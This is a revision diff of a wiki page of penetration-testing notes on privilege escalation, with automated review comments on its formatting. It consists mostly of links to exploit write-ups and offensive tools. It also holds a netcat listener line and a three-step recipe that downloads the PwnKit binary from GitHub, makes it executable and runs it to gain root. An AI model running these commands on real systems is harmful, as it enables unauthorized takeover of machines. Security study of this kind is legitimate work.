privilege_escalation

Differences

This page shows the differences between the selected revision and the current version of the page.

privilege_escalation [2022/06/21 10:13]
M0N5T3R
privilege_escalation [2024/02/09 20:50] (current version)
M0N5T3R
Ligne 1: Ligne 1:
 {{ :privesc.jpg?nolink&1600 |}} {{ :privesc.jpg?nolink&1600 |}}
 +
 +====== MacOs ======
 +
 +    https://www.ns-echo.com/posts/cve_2023_33298.html
 +
 +====== docker ======
 +    https://flast101.github.io/docker-privesc/
 +    https://github.com/stealthcopter/deepce
 +
 +
 +====== active directory ======
 +    https://github.com/CravateRouge/bloodyAD
 +    https://github.com/antonioCoco/RemotePotato0
 +    https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4
 +    https://github.com/Dec0ne/KrbRelayUp
  
  
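Review bot: the links added under the new `MacOs`, `docker` and `active directory` headings are indented with four spaces, which DokuWiki renders as a preformatted block rather than as clickable links, and none of them carries a description of what it covers. Suggest `  * ` list items with a short label each, as the existing tools list does, and heading capitalisation consistent with the existing `====== Linux ======`.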
Ligne 32: Ligne 47:
          
 **tools :** **tools :**
 +
 +  * PrivescCheck: This script aims to enumerate common Windows configuration issues that can be leveraged for local privilege escalation. It also gathers various information that might be useful for exploitation and/or post-exploitation. https://github.com/itm4n/PrivescCheck
 +
  
   * WINPEAS Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz  and check more information about how to exploit found misconfigurations in book.hacktricks.xyz https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS   * WINPEAS Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz  and check more information about how to exploit found misconfigurations in book.hacktricks.xyz https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
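Review bot: the blank `+` lines added before and after the PrivescCheck item separate it from the WINPEAS item, so the tools end up as two one-item lists instead of one. Suggest dropping those blank lines so both entries sit in the same `  * ` list under `**tools :**`.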
Ligne 73: Ligne 91:
   * -> Depuis kali : nc -nlvp 7777   * -> Depuis kali : nc -nlvp 7777
  
 +
 +
 +
 +
 +**Liste de ressources :**
 +
 +    https://www.redtimmy.com/privilege-escalation/pulse-secure-client-for-windows-9-1-6-toctou-privilege-escalation-cve-2020-13162/
 +    https://www.mandiant.com/resources/blog/arbitrary-file-deletion-vulnerabilities
 +    https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers
 +    CVE-2024-20656 – Local Privilege Escalation in the VSStandardCollectorService150 Service
 +    https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks
 +    https://github.com/LordNoteworthy/windows-exploitation
 +    https://nixhacker.com/understanding-and-exploiting-symbolic-link-in-windows/
 +    https://troopers.de/downloads/troopers19/TROOPERS19_AD_Abusing_privileged_file_operations.pdf
 +    https://blog.zecops.com/research/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/
 +    https://offsec.almond.consulting/intro-to-file-operation-abuse-on-Windows.html
 +    https://www.cyberark.com/resources/threat-research-blog/follow-the-link-exploiting-symbolic-links-with-ease
 +    https://github.com/Wh04m1001?tab=repositories
 +    https://secret.club/2020/04/23/directory-deletion-shell.html    
 +    https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/
 +
 +
 +
 +**Liste de writeups**
 +
 +    https://dreamlab.net/en/blog/post/dropbox-escalation-of-privileges-to-system-on-windows-1/
 +    https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/
 +    https://www.mdsec.co.uk/2024/01/cve-2024-20656-local-privilege-escalation-in-vsstandardcollectorservice150-service/
 +    https://www.atredis.com/blog/cve-2018-0952-privilege-escalation-vulnerability-in-windows-standard-collector-service
  
 ====== Linux ====== ====== Linux ======
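Review bot: in the `**Liste de ressources :**` block, the entry `CVE-2024-20656 – Local Privilege Escalation in the VSStandardCollectorService150 Service` is a title with no URL, and the mdsec.co.uk article carrying that CVE in its path is already linked under `**Liste de writeups**`. Suggest dropping the title-only line or keeping the link in one list only. The four-space indentation also turns both lists into preformatted text, the second heading lacks the ` :` the first one uses, and four blank lines are added ahead of the block.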
Ligne 95: Ligne 142:
 **Linux Privilege Escalation using SUID Binaries** **Linux Privilege Escalation using SUID Binaries**
 https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/ https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
 +
 +**Escalate to root using pkexec**
 +  * curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit || exit
 +  * chmod +x PwnKit 
 +  * ./PwnKit
  
  
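Review bot: the `curl` step fetches a prebuilt binary from the `main` branch of a third-party repository and the next two steps mark it executable and run it, with no pinned revision or checksum, so what gets executed can change without this page changing. Suggest linking the repository itself, pinning the URL to a specific commit with the expected hash recorded beside it, and stating which vulnerability and which pkexec versions the entry refers to. The trailing `|| exit` only makes sense in a one-line form and should go now that the steps are separate list items.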
privilege_escalation.1655799183.txt.gz · Last modified: 2022/06/21 10:13 by M0N5T3R